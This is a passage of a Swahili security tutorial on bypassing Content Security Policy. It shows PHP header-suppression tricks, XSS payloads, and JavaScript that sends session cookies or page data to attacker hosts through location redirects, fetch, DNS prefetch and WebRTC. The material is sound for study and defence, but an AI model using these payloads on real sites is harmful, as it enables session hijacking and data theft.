Mbinu nyingine inajumuisha kutumia CSP yenyewe ili kugundua subdomain ya siri. Njia hii inategemea binary search algorithm na kurekebisha CSP ili kujumuisha domains maalum ambazo zinazuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri ina tabaka za herufi zisizojulikana, unaweza kufanya majaribio kwa kurudia kwa subdomains tofauti kwa kubadilisha CSP directive ili kuzizuia au kuziruhusu subdomains hizi. Hapa kuna snippet inayoonyesha jinsi CSP inaweza kuwekwa kusaidia mbinu hii:

img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev

Kwa kufuatilia maombi ambayo CSP inazuia au kuruhusu, mtu anaweza kupunguza herufi zinazowezekana katika subdomain ya siri, na hatimaye kugundua URL kamili.

Njia zote mbili zinatumia undani wa utekelezaji wa CSP na tabia katika browsers, zikionesha jinsi sera zinavyoonekana salama zinaweza bila kukusudia leak taarifa nyeti.

Mbinu kutoka here.

Teknolojia hatarishi za ku-bypass CSP

PHP Errors when too many params

Kulingana na last technique commented in this video, kutuma vigezo vingi (1001 GET parameters ingawa pia unaweza kufanya hivyo kwa POST params na faili zaidi ya 20). Kila header() iliyofafanuliwa kwenye code ya PHP ya web haitatumwa kutokana na kosa ambalo hilo litasababisha.

PHP response buffer overload

PHP inajulikana kwa ku-buffering the response to 4096 bytes kwa default. Kwa hivyo, ikiwa PHP inaonyesha warning, kwa kutoa enough data inside warnings, the response itatumwa before the CSP header, causing the header to be ignored.
Kisha, mbinu inahusisha kwa msingi kujaza the response buffer with warnings ili CSP header isitumwe.

Wazo kutoka this writeup.

Kill CSP via max_input_vars (headers already sent)

Kwa sababu headers lazima zitumwe kabla ya output yoyote, warnings zinazotolewa na PHP zinaweza kuharibu wito za baadaye za header(). Ikiwa input ya mtumiaji itazidi max_input_vars, PHP itatoa startup warning kwanza; header('Content-Security-Policy: ...') yoyote baada yake itashindwa na “headers already sent”, kwa ufanisi kuzima CSP na kuruhusu XSS reflektifu ambayo vinginevyo ingekuwa imesitishwa.

<?php
header("Content-Security-Policy: default-src 'none';");
echo $_GET['xss'];

Mfano:

# CSP in place → payload blocked by browser
curl -i "http://orange.local/?xss=<svg/onload=alert(1)>"

# Exceed max_input_vars to force warnings before header() → CSP stripped
curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000"
# Warning: PHP Request Startup: Input variables exceeded 1000 ...
# Warning: Cannot modify header information - headers already sent

Kuandika Upya Ukurasa wa Makosa

Kutoka kwa this writeup inaonekana kuwa ilikuwa inawezekana kuvuka ulinzi wa CSP kwa kupakia ukurasa wa makosa (inawezekana bila CSP) na kuandika upya yaliyomo yake.

a = window.open("/" + "x".repeat(4100))
setTimeout(function () {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`
}, 1000)

SOME + 'self' + wordpress

SOME ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) in an endpoint of a page ili abuse other endpoints of the same origin. Hii inafanywa kwa kupakia vulnerable endpoint kutoka kwenye attacker page kisha ku-refresh attacker page hadi real endpoint katika same origin unayotaka kuabuse. Kwa njia hii vulnerable endpoint inaweza kutumia object ya opener katika payload ili access the DOM ya real endpoint to abuse. Kwa maelezo zaidi angalia:

{{#ref}} ../xss-cross-site-scripting/some-same-origin-method-execution.md {{#endref}}

Zaidi ya hayo, wordpress ina JSONP endpoint katika /wp-json/wp/v2/users/1?_jsonp=data ambayo ita reflect the data iliyotumwa kwenye output (kwa kikomo cha herufi, namba na nukta pekee).

Mshambuliaji anaweza kuabuse endpoint hiyo ili generate a SOME attack dhidi ya WordPress na embed ndani ya <script src=/wp-json/wp/v2/users/1?_jsonp=some_attack></script> kumbuka kwamba hii script ita loaded kwa sababu ime allowed by 'self'. Zaidi ya hayo, na kwa kuwa WordPress imewekwa, mshambuliaji anaweza kuabuse SOME attack kupitia vulnerable callback endpoint ambayo bypasses the CSP ili kumpa mtumiaji haki zaidi, kusanisha plugin mpya...
Kwa maelezo zaidi kuhusu jinsi ya kufanya shambulio hili angalia https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/

CSP Exfiltration Bypasses

Kama kuna CSP kali ambayo haikuruhusu interact with external servers, bado kuna baadhi ya njia ambazo unaweza kutumia ku-exfiltrate taarifa.

Location

Unaweza tu kusasisha location ili kutuma kwa server ya mshambuliaji taarifa zilizofichwa:

var sessionid = document.cookie.split("=")[1] + "."
document.location = "https://attacker.com/?" + sessionid

Meta tag

Unaweza kufanya redirect kwa kuingiza meta tag (hii ni redirect tu, hii haitaleak maudhui)

<meta http-equiv="refresh" content="1; http://attacker.com" />

DNS Prefetch

Ili kupakia kurasa kwa haraka, vivinjari zitapata mapema kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwenye kache kwa matumizi baadaye.
Unaweza kumwelekeza kivinjari kutatua jina la mwenyeji mapema kwa kutumia: <link rel="dns-prefetch" href="something.com">

Unaweza kutumia tabia hii vibaya ili exfiltrate sensitive information via DNS requests:

var sessionid = document.cookie.split("=")[1] + "."
var body = document.getElementsByTagName("body")[0]
body.innerHTML =
body.innerHTML +
'<link rel="dns-prefetch" href="//' +
sessionid +
'attacker.ch">'

Njia nyingine:

const linkEl = document.createElement("link")
linkEl.rel = "prefetch"
linkEl.href = urlWithYourPreciousData
document.head.appendChild(linkEl)

Ili kuzuia hili lisitokee, seva inaweza kutuma HTTP header:

X-DNS-Prefetch-Control: off

Tip

Inaonekana, mbinu hii haitumiki katika headless browsers (bots)

WebRTC

Kwenye kurasa kadhaa unaweza kusoma kwamba WebRTC haitakagui sera ya connect-src ya CSP.

Kwa kweli unaweza leak taarifa kwa kutumia ombi la DNS. Angalia msimbo huu:

;(async () => {
p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
p.createDataChannel("")
p.setLocalDescription(await p.createOffer())
})()

Chaguo lingine:

var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

CredentialsContainer

Popup ya credentials ituma ombi la DNS kwa iconURL bila kuzuiwa na ukurasa. Inafanya kazi tu katika muktadha salama (HTTPS) au kwenye localhost.

navigator.credentials.store(
new FederatedCredential({
id:"satoki",
name:"satoki",
provider:"https:"+your_data+"example.com",
iconURL:"https:"+your_data+"example.com"
})
)

Kukagua Sera za CSP Mtandaoni

Kuunda CSP kwa Kiotomatiki

https://csper.io/docs/generating-content-security-policy

README.md Unescape Escape

Content Security Policy (CSP) Bypass

CSP ni nini

Vichwa

Kufafanua Rasilimali

Maelekezo

Vyanzo

Kanuni za CSP zisizo salama

'unsafe-inline'

self + 'unsafe-inline' via Iframes

'unsafe-eval'

strict-dynamic

Wildcard (*)

Kukosa object-src na default-src

Kupakia Faili + 'self'

Form-action

Third Party Endpoints + ('unsafe-eval')

Payloads zinazotumia Angular + maktaba yenye functions zinazorejesha window object (check out this post):

Kutumia vibaya google recaptcha JS code

Kutumia vibaya www.google.com kwa open redirect

Endpoints za wahusika wa tatu + JSONP

Matumizi Mabaya ya Wahusika wa Tatu

Bypass via RPO (Relative Path Overwrite)

Utekelezaji wa JS kwenye Iframes

Kukosa base-uri

AngularJS matukio

AngularJS na whitelisted domain

Bypass via Redirection

Bypass CSP kwa dangling markup

'unsafe-inline'; img-src *; via XSS

Kwa Service Workers

Policy Injection

Chrome

Edge

img-src *; via XSS (iframe) - Time attack

Kupitia Bookmarklets

CSP bypass by restricting CSP

JS exfiltration with Content-Security-Policy-Report-Only

CVE-2020-6519

Leaking Information with CSP and Iframe

Teknolojia hatarishi za ku-bypass CSP

PHP Errors when too many params

PHP response buffer overload

Kill CSP via max_input_vars (headers already sent)

Kuandika Upya Ukurasa wa Makosa

SOME + 'self' + wordpress

CSP Exfiltration Bypasses

Location

Meta tag

DNS Prefetch

WebRTC

CredentialsContainer

Kukagua Sera za CSP Mtandaoni

Kuunda CSP kwa Kiotomatiki

Marejeo

README.md

Payloads zinazotumia Angular + maktaba yenye functions zinazorejesha `window` object (check out this post):